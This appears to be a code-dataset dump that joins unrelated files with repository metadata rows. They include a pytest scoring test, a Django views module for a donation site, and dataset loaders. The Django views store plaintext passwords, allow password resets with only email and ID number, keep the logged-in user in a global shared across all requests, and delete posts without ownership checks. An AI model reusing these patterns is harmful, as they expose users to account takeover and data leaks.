This function tests the case for reward_d
"""
# Setting for this case:
# my_peer's initial status:
# Pending table: there is a pending orderinfo instance from the competitor.
# Behavior: neighbor sends order to my_peer
# Result: Order from neighbor not stored since competitor won over neighbor (reward_e).
# Arrange.
my_peer: Peer = create_a_test_peer(scenario, engine)[0]
neighbor: Peer = create_a_test_peer(scenario, engine)[0]
competitor: Peer = create_a_test_peer(scenario, engine)[0]
order: Order = create_a_test_order(scenario)
# establish neighborhood
for anyone in (neighbor, competitor):
my_peer.add_neighbor(anyone)
anyone.add_neighbor(my_peer)
# let neighbor and competitor own the order that it should have
for anyone in (neighbor, competitor):
anyone.receive_order_external(order)
anyone.send_orders_to_on_chain_check(anyone.local_clock)
anyone.store_orders()
# setup the initial status for my_peer
my_peer.receive_order_internal(competitor, order)
# clear score sheet for neighbor
my_peer.peer_neighbor_mapping[neighbor].share_contribution[-1] = 0
# define fake functions.
# This fake function sets storage_decision as True for orderinfo from competitor and
# False from neighbor.
def fake_store_or_discard_orders(peer):
for orderinfo_list in peer.order_pending_orderinfo_mapping.values():
for orderinfo in orderinfo_list:
if orderinfo.prev_owner == neighbor:
orderinfo.storage_decision = False
else:
orderinfo.storage_decision = True
monkeypatch.setattr(engine, "store_or_discard_orders", fake_store_or_discard_orders)
# Act.
# neighbor sends the order to my_peer
my_peer.receive_order_internal(neighbor, order)
# store orders
my_peer.send_orders_to_on_chain_check(my_peer.local_clock)
my_peer.store_orders()
# calculate scores. The value equals to the last entry of the score sheet.
my_peer.score_neighbors()
# Assert.
assert my_peer.peer_neighbor_mapping[neighbor].score == 11
| 34.509479 | 96 | 0.730619 | 1,995 | 14,563 | 5.052632 | 0.085714 | 0.06131 | 0.028373 | 0.026786 | 0.884722 | 0.874206 | 0.874206 | 0.871131 | 0.871131 | 0.871131 | 0 | 0.003498 | 0.195083 | 14,563 | 421 | 97 | 34.591449 | 0.856424 | 0.329259 | 0 | 0.820809 | 0 | 0 | 0.030866 | 0.019843 | 0 | 0 | 0 | 0 | 0.040462 | 1 | 0.069364 | false | 0 | 0.023121 | 0.00578 | 0.098266 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
74e4ed898a27f2f0e7951d1b8cc8ad0a94ca848a | 28,072 | py | Python | controle_doacoes/doacoes/views.py | henrimory/GoHero | 217d2336d7c9dbb642611742e57e3737bb06bfba | [
"MIT"
] | null | null | null | controle_doacoes/doacoes/views.py | henrimory/GoHero | 217d2336d7c9dbb642611742e57e3737bb06bfba | [
"MIT"
] | null | null | null | controle_doacoes/doacoes/views.py | henrimory/GoHero | 217d2336d7c9dbb642611742e57e3737bb06bfba | [
"MIT"
] | 1 | 2020-12-12T00:49:30.000Z | 2020-12-12T00:49:30.000Z | from typing import Any
from django.shortcuts import render, redirect
from .forms import contato, endereco, formOng, formUser, formPubliDoador, formPubliOng, formOngUp, formUserUp
from .models import Doador, Ong, Publicacao_Ong, Publicacao_Doador, Endereco, Numero_Contato
data = {}
def visitPerfilNotLog(request,pk):
dadosOng = Ong.objects.all()
dadosDoa = Doador.objects.all()
for dado in dadosOng:
if pk == dado.nome:
perfilVisitado = Ong.objects.all().get(nome=pk)
endVisitado = Endereco.objects.get(logradouro=perfilVisitado.id_endereco)
telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
postagensVisitado = Publicacao_Ong.objects.filter(id_ong=perfilVisitado).order_by('-data_publicacao')
data['perfilVisitado'] = perfilVisitado
data['tipoVisitado'] = 'ong'
data['endVisitado'] = endVisitado
data['telefone'] = telefone
data['postagensVisitado'] = postagensVisitado
return render(request, 'visitPerfilNotLog.html', data)
for dado in dadosDoa:
if pk == dado.nome:
perfilVisitado = Doador.objects.all().get(nome=pk)
endVisitado = Endereco.objects.get(logradouro=perfilVisitado.id_endereco)
telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
postagensVisitado = Publicacao_Doador.objects.filter(id_doador=perfilVisitado).order_by('-data_publicacao')
data['perfilVisitado'] = perfilVisitado
data['telefone'] = telefone
data['tipoVisitado'] = 'doador'
data['endVisitado'] = endVisitado
data['postagensVisitado'] = postagensVisitado
return render(request, 'visitPerfilNotLog.html', data)
def recoverPass(request):
if request.POST:
email = request.POST['emailRec']
cpf = request.POST['cpfRec']
cnpj = request.POST['cnpjRec']
senha = request.POST['senhaRec']
dadoUser = Doador.objects.all()
dadoOng = Ong.objects.all()
if cpf:
for dados in dadoUser:
if dados.email_doador == email and dados.cpf == cpf:
dados.senha = senha
dados.save()
data['recSuces'] = True
data['erroRec'] = False
return redirect('url_login')
else:
for dadosOng in dadoOng:
if dadosOng.email_ong == email and dadosOng.cnpj == cnpj:
dadosOng.senha = senha
dadosOng.save()
data['recSuces'] = True
data['erroRec'] = False
return redirect('url_login')
data['erroRec'] = True
return render(request, 'RecuperarSenha.html', data)
def anuncioOngs(request):
postAnunc = Publicacao_Ong.objects.filter(categoria="EVENTO").order_by('-data_publicacao')
data['postAnunc'] = postAnunc
return render(request, 'anunciosOngs.html', data)
def home(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['recSuces'] = False
return render(request, 'home.html', data)
def homePostOng(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postOngs = Publicacao_Ong.objects.all().order_by('-data_publicacao').exclude(id_ong=data['userLog'].pk)
data['postOngs'] = postOngs
data['postDoadores'] = False
return render(request, 'home.html',data)
def homePostDoador(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postDoador = Publicacao_Doador.objects.order_by('-data_publicacao').exclude(id_doador=data['userLog'].pk)
data['postOngs'] = False
data['postDoadores'] = postDoador
return render(request,'home.html',data)
def homePostEventos(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postEventos = Publicacao_Doador.objects.filter(categoria="EVENTO").order_by('-data_publicacao')
data['postEventos'] = postEventos
postEventosOng = Publicacao_Ong.objects.filter(categoria="EVENTO").order_by('-data_publicacao')
data['postEventosOng'] = postEventosOng
return render(request, 'homeEventos.html',data)
def homePostCalcados(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postCal = Publicacao_Doador.objects.filter(categoria="CALÇADO").order_by('-data_publicacao')
postCalOng = Publicacao_Ong.objects.filter(categoria="CALÇADO").order_by('-data_publicacao')
data['postCalOng'] = postCalOng
data['postCal'] = postCal
return render(request, 'homeCal.html',data)
def homePostRoupas(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postRoupas = Publicacao_Doador.objects.filter(categoria="ROUPA").order_by('-data_publicacao')
postRoupasOng = Publicacao_Ong.objects.filter(categoria="ROUPA").order_by('-data_publicacao')
data['postRoupasOng'] = postRoupasOng
data['postRoupas'] = postRoupas
return render(request, 'homeRoupas.html',data)
def homePostAlimentos(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postAlimentos = Publicacao_Doador.objects.filter(categoria="ALIMENTO").order_by('-data_publicacao')
postAlimentosOng = Publicacao_Ong.objects.filter(categoria="ALIMENTO").order_by('-data_publicacao')
data['postAlimentosOng'] = postAlimentosOng
data['postAlimentos'] = postAlimentos
return render(request, 'homeAlimentos.html',data)
def homePostMoveis(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postMoveis = Publicacao_Doador.objects.filter(categoria="MÓVEL").order_by('-data_publicacao')
postMoveisOng = Publicacao_Ong.objects.filter(categoria="MÓVEL").order_by('-data_publicacao')
data['postMoveisOng'] = postMoveisOng
data['postMoveis'] = postMoveis
return render(request, 'homeMoveis.html',data)
def homePostEletrodomesticos(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postEletro = Publicacao_Doador.objects.filter(categoria="ELETRODOMÉSTICO").order_by('-data_publicacao')
postEletroOng = Publicacao_Ong.objects.filter(categoria="ELETRODOMÉSTICO").order_by('-data_publicacao')
data['postEletroOng'] = postEletroOng
data['postEletro'] = postEletro
return render(request, 'homeEletro.html',data)
def homePostDoacao(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'home.html',data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
postDoacao = Publicacao_Doador.objects.filter(categoria="DOAÇÃO").order_by('-data_publicacao')
data['postDoacao'] = postDoacao
postDoacaoOng = Publicacao_Ong.objects.filter(categoria="DOAÇÃO").order_by('-data_publicacao')
data['postDoacaoOng'] = postDoacaoOng
return render(request, 'homeDoacao.html',data)
def inicio(request):
data['recSuces'] = False
return render(request, 'inicial.html',data)
def logout(request):
data['acesso'] = False
data['erroLogin'] = False
data['recSuces'] = False
return render(request, 'inicial.html', data)
def login(request):
data['acesso'] = False
data['erroLogin'] = False
if request.POST:
email = request.POST['email']
senha = request.POST['senha']
dadoUser = Doador.objects.all()
dadoOng = Ong.objects.all()
for dados in dadoUser:
if dados.email_doador == email and dados.senha == senha:
data['acesso'] = True
userLog = Doador.objects.all().get(email_doador=email,senha=senha)
searchOng = Ong.objects.all()
searchDoador = Doador.objects.all()
data['searchOng'] = searchOng
data['searchDoador'] = searchDoador
data['userLog'] = userLog
data['tipoUser'] = "doador"
return redirect('url_homePostOng')
for dadosOng in dadoOng:
if dadosOng.email_ong == email and dadosOng.senha == senha:
data['acesso'] = True
userLog = Ong.objects.all().get(email_ong=email, senha=senha)
searchOng = Ong.objects.all()
searchDoador = Doador.objects.all()
data['searchOng'] = searchOng
data['searchDoador'] = searchDoador
data['userLog'] = userLog
data['tipoUser'] = "ong"
return redirect('url_homePostDoador')
data['erroLogin'] = True
data['recSuces'] = False
return render(request, 'login.html', data)
return render(request, 'login.html', data)
def cadastroEndeOng(request):
form = endereco(request.POST or None, request.FILES or None) #formulario de Endereço
if form.is_valid():
tel = request.POST['tel']
Numero_Contato.objects.create(telefone=tel)
form.save()
return redirect('url_cadOng')
data['formEndOng'] = form
return render(request, 'cadastroEndeOng.html', data)
def cadastroOng(request):
if request.POST and request.FILES:
nomeOng = request.POST['nomeOng']
cnpj = request.POST['cnpj']
emailOng = request.POST['emailOng']
senhaOng = request.POST['senhaOng']
imgPerfilOng = request.FILES['imgPerfil1']
endereco = Endereco.objects.latest('pk')
telefone = Numero_Contato.objects.latest('pk')
Ong.objects.create(nome=nomeOng,cnpj=cnpj,email_ong=emailOng,senha=senhaOng,imagem=imgPerfilOng,id_endereco=endereco,id_numero=telefone)
return redirect('url_login')
return render(request, 'cadastroOng.html', data)
def cadastroUser(request):
if request.POST and request.FILES:
nomeDoador = request.POST['nomeDoador']
cpf = request.POST['cpf']
emailDoador = request.POST['emailDoador']
senhaDoador = request.POST['senhaDoador']
imgPerfilDoador = request.FILES['imgPerfil1']
endereco = Endereco.objects.latest('pk')
telefone = Numero_Contato.objects.latest('pk')
Doador.objects.create(nome=nomeDoador,cpf=cpf,email_doador=emailDoador,senha=senhaDoador,imagem=imgPerfilDoador,id_endereco=endereco,id_numero=telefone)
return redirect('url_login')
return render(request, 'cadastroUser.html', data)
def cadastroEnde(request):
form = endereco(request.POST or None, request.FILES or None)
if form.is_valid():
tel = request.POST['tel']
Numero_Contato.objects.create(telefone=tel)
form.save()
return redirect('url_cadUser')
data['formEnd'] = form
return render(request, 'cadastroEnde.html', data)
def perfil(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'perfil.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
if data['tipoUser'] == "doador":
postagens = Publicacao_Doador.objects.filter(id_doador=data['userLog']).order_by('-data_publicacao')
data['posts'] = postagens
return render(request, 'perfil.html', data)
elif data['tipoUser'] == "ong":
postagens = Publicacao_Ong.objects.filter(id_ong=data['userLog']).order_by('-data_publicacao')
data['posts'] = postagens
return render(request, 'perfil.html', data)
def infos(request, pk):
if data['tipoUser'] == "ong":
dadosGerais = Ong.objects.get(pk = pk)
formUpdate = formOngUp(request.POST or None,request.FILES or None,instance=dadosGerais)
user = Ong.objects.get(pk=data['userLog'].pk)
elif data['tipoUser'] == "doador":
dadosGerais = Doador.objects.get(pk = pk)
formUpdate = formUserUp(request.POST or None,request.FILES or None,instance=dadosGerais)
user = Doador.objects.get(pk=data['userLog'].pk)
dadosEnde = Endereco.objects.get(logradouro = user.id_endereco)
formUpdateEnd = endereco(request.POST or None, request.FILES or None, instance=dadosEnde)
formUpdateCont = contato(request.POST or None, request.FILES or None, instance=user.id_numero)
if formUpdate.is_valid():
if data['tipoUser'] == "doador":
if request.FILES:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_doador']
cpf = formUpdate.cleaned_data['cpf']
img = request.FILES['imgPerfil1']
doador = Doador.objects.get(nome=data['userLog'])
doador.nome = nome
doador.cpf = cpf
doador.email_doador = email
doador.imagem = img
doador.save()
data['userLog'] = doador
else:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_doador']
cpf = formUpdate.cleaned_data['cpf']
doador = Doador.objects.get(nome=data['userLog'])
doador.nome = nome
doador.cpf = cpf
doador.email_doador = email
doador.save()
data['userLog'] = doador
elif data['tipoUser'] == "ong":
if request.FILES:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_ong']
cnpj = formUpdate.cleaned_data['cnpj']
img = request.FILES['imgPerfil1']
ong = Ong.objects.get(nome=data['userLog'])
ong.nome = nome
ong.cnpj = cnpj
ong.email_ong = email
ong.imagem = img
ong.save()
data['userLog'] = ong
else:
nome = formUpdate.cleaned_data['nome']
email = formUpdate.cleaned_data['email_ong']
cnpj = formUpdate.cleaned_data['cnpj']
ong = Ong.objects.get(nome=data['userLog'])
ong.nome = nome
ong.cnpj = cnpj
ong.email_ong = email
ong.save()
data['userLog'] = ong
return redirect('url_infos',pk)
if formUpdateEnd.is_valid():
formUpdateEnd.save()
return redirect('url_infos', pk)
if formUpdateCont.is_valid():
formUpdateCont.save()
return redirect('url_infos', pk)
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'infos.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['formUpdate'] = formUpdate
data['formUpdateEnd'] = formUpdateEnd
data['formCont'] = formUpdateCont
data['userUp'] = user
return render(request, 'infos.html', data)
def deletePostOng(request,pk):
publicacao = Publicacao_Ong.objects.get(pk=pk)
publicacao.delete()
return redirect('url_perfil')
def deletePostDoador(request,pk):
publicacao = Publicacao_Doador.objects.get(pk=pk)
publicacao.delete()
return redirect('url_perfil')
def editPostOng(request,pk):
publicacao = Publicacao_Ong.objects.get(pk=pk)
form = formPubliOng(request.POST or None, request.FILES or None,instance=publicacao)
if form.is_valid():
if request.FILES:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
catg = form.cleaned_data['categoria']
img = request.FILES['imgPost']
publicacao.titulo = titulo
publicacao.descricao = desc
publicacao.categoria = catg
publicacao.imagem = img
publicacao.save()
return redirect('url_perfil')
else:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
catg = form.cleaned_data['categoria']
publicacao.titulo = titulo
publicacao.descricao = desc
publicacao.categoria = catg
publicacao.save()
return redirect('url_perfil')
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'editPostOng.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['formEditPostOng'] = form
data['publicacao'] = publicacao
return render(request, 'editPostOng.html', data)
def editPostDoador(request,pk):
publicacao = Publicacao_Doador.objects.get(pk=pk)
form = formPubliDoador(request.POST or None,request.FILES or None, instance=publicacao)
if form.is_valid():
if request.FILES:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
catg = form.cleaned_data['categoria']
img = request.FILES['imgPost']
publicacao.titulo = titulo
publicacao.descricao = desc
publicacao.categoria = catg
publicacao.imagem = img
publicacao.save()
return redirect('url_perfil')
else:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
catg = form.cleaned_data['categoria']
publicacao.titulo = titulo
publicacao.descricao = desc
publicacao.categoria = catg
publicacao.save()
return redirect('url_perfil')
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'editPostDoador.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['formEditPostDoador'] = form
data['publicacao'] = publicacao
return render(request, 'editPostDoador.html', data)
def newPost(request,pk):
form = formPubliDoador(request.POST or None, request.FILES or None)
if form.is_valid():
if request.FILES:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
categ = form.cleaned_data['categoria']
img = request.FILES['imgPost']
doador = data['userLog']
Publicacao_Doador.objects.create(titulo=titulo,descricao=desc,categoria=categ,imagem=img,id_doador=doador)
return redirect('url_perfil')
# Código de Pesquisa de Usuário
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'newPost.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['formPost'] = form
return render(request, 'newPost.html', data)
def newPostOng(request,pk):
form = formPubliOng(request.POST or None, request.FILES or None)
if form.is_valid():
if request.FILES:
titulo = form.cleaned_data['titulo']
desc = form.cleaned_data['descricao']
categ = form.cleaned_data['categoria']
img = request.FILES['imgPost']
ong = data['userLog']
Publicacao_Ong.objects.create(titulo=titulo,descricao=desc,categoria=categ,imagem=img,id_ong=ong)
return redirect('url_perfil')
# Código de Pesquisa de Usuário
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'newPost.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
data['formPost'] = form
return render(request, 'newPost.html', data)
def visitPerfil(request, pk):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'visitPerfil.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
dadosOng = Ong.objects.all()
dadosDoa = Doador.objects.all()
for dado in dadosOng:
if pk == dado.nome:
perfilVisitado = Ong.objects.all().get(nome=pk)
endVisitado = Endereco.objects.get(logradouro = perfilVisitado.id_endereco)
telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
postagensVisitado = Publicacao_Ong.objects.filter(id_ong=perfilVisitado).order_by('-data_publicacao')
data['perfilVisitado'] = perfilVisitado
data['tipoVisitado'] = 'ong'
data['endVisitado'] = endVisitado
data['telefone'] = telefone
data['postagensVisitado'] = postagensVisitado
return render(request, 'visitPerfil.html', data)
for dado in dadosDoa:
if pk == dado.nome:
perfilVisitado = Doador.objects.all().get(nome=pk)
endVisitado = Endereco.objects.get(logradouro=perfilVisitado.id_endereco)
telefone = Numero_Contato.objects.get(telefone=perfilVisitado.id_numero)
postagensVisitado = Publicacao_Doador.objects.filter(id_doador=perfilVisitado).order_by('-data_publicacao')
data['perfilVisitado'] = perfilVisitado
data['telefone'] = telefone
data['tipoVisitado'] = 'doador'
data['endVisitado'] = endVisitado
data['postagensVisitado'] = postagensVisitado
return render(request, 'visitPerfil.html', data)
def search(request):
if request.POST:
nomeSearch = request.POST.get('searchName')
if nomeSearch == "":
return render(request, 'searchPerfil.html', data)
else:
compatibleUserOng = Ong.objects.filter(nome__contains=nomeSearch)
compatibleUserDoador = Doador.objects.filter(nome__contains=nomeSearch)
data['compatibleUserOng'] = compatibleUserOng
data['compatibleUserDoador'] = compatibleUserDoador
return redirect('url_search')
return render(request, 'searchPerfil.html', data)
| 44.347551 | 160 | 0.639962 | 2,709 | 28,072 | 6.530454 | 0.073828 | 0.041038 | 0.0537 | 0.050873 | 0.814708 | 0.791872 | 0.75886 | 0.739981 | 0.701769 | 0.674467 | 0 | 0.00019 | 0.249822 | 28,072 | 632 | 161 | 44.417722 | 0.839878 | 0.003206 | 0 | 0.728374 | 0 | 0 | 0.134752 | 0.001573 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051903 | false | 0.00173 | 0.00692 | 0 | 0.209343 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d190ed5be733bf79dccb566dcd6257042831f0b | 178 | py | Python | ImageProcessing/cnn.py | OrangeTien/Movie_Data_Capture | 96c6b6ea96b4f16b24f673448c083c209dcd18d1 | [
"MIT"
] | 562 | 2021-12-17T17:23:38.000Z | 2022-03-31T16:32:39.000Z | ImageProcessing/cnn.py | qxzg/Movie_Data_Capture | 3fdcf03d8a15b44e8e6c361329ddd6132b1f7189 | [
"MIT"
] | 123 | 2021-12-18T03:37:48.000Z | 2022-03-30T12:29:21.000Z | ImageProcessing/cnn.py | qxzg/Movie_Data_Capture | 3fdcf03d8a15b44e8e6c361329ddd6132b1f7189 | [
"MIT"
] | 119 | 2021-12-18T03:56:24.000Z | 2022-03-31T08:28:03.000Z | import sys
sys.path.append('../')
from ImageProcessing.hog import face_center as hog_face_center
def face_center(filename, model):
return hog_face_center(filename, model)
| 19.777778 | 62 | 0.780899 | 26 | 178 | 5.115385 | 0.538462 | 0.300752 | 0.195489 | 0.345865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123596 | 178 | 8 | 63 | 22.25 | 0.852564 | 0 | 0 | 0 | 0 | 0 | 0.016854 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
2d2d7365c184c1687f5be4323782b98ac31e4726 | 39,510 | py | Python | MRCpy/datasets/load.py | KARTHEEKCIC/MRCpy | ed91c68fa3538db1bd59867d943f42d5a11e2d98 | [
"MIT"
] | 28 | 2021-03-22T09:41:16.000Z | 2022-03-15T18:21:23.000Z | MRCpy/datasets/load.py | MachineLearningBCAM/Minimax-Risk-Classifiers | 65e4da8fd1907cd7f85b2688c91354a26ff48253 | [
"MIT"
] | 1 | 2021-08-08T14:02:30.000Z | 2021-08-09T10:11:38.000Z | MRCpy/datasets/load.py | MachineLearningBCAM/Minimax-Risk-Classifiers | 65e4da8fd1907cd7f85b2688c91354a26ff48253 | [
"MIT"
] | 1 | 2021-08-09T08:06:26.000Z | 2021-08-09T08:06:26.000Z | import csv
from os.path import dirname, join
import numpy as np
from sklearn.impute import SimpleImputer
from sklearn.utils import Bunch
def normalizeLabels(origY):
"""
Normalize the labels of the instances in the range 0,...r-1 for r classes
"""
# Map the values of Y from 0 to r-1
domY = np.unique(origY)
Y = np.zeros(origY.shape[0], dtype=int)
for i, y in enumerate(domY):
Y[origY == y] = i
return Y
def load_adult(return_X_y=False):
"""Load and return the adult incomes prediction dataset (classification).
================= ==============
Classes 2
Samples per class [37155,11687]
Samples total 48882
Dimensionality 14
Features int, positive
================= ==============
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'adult.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'adult.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file)
# names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float64)
target[i] = np.asarray(d[-1], dtype=int)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_diabetes(return_X_y=False):
"""Load and return the Pima Indians Diabetes dataset (classification).
================= =====================
Classes 2
Samples per class [500,268]
Samples total 668
Dimensionality 8
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'diabetes.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'diabetes.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float64)
target[i] = np.asarray(d[-1], dtype=int)
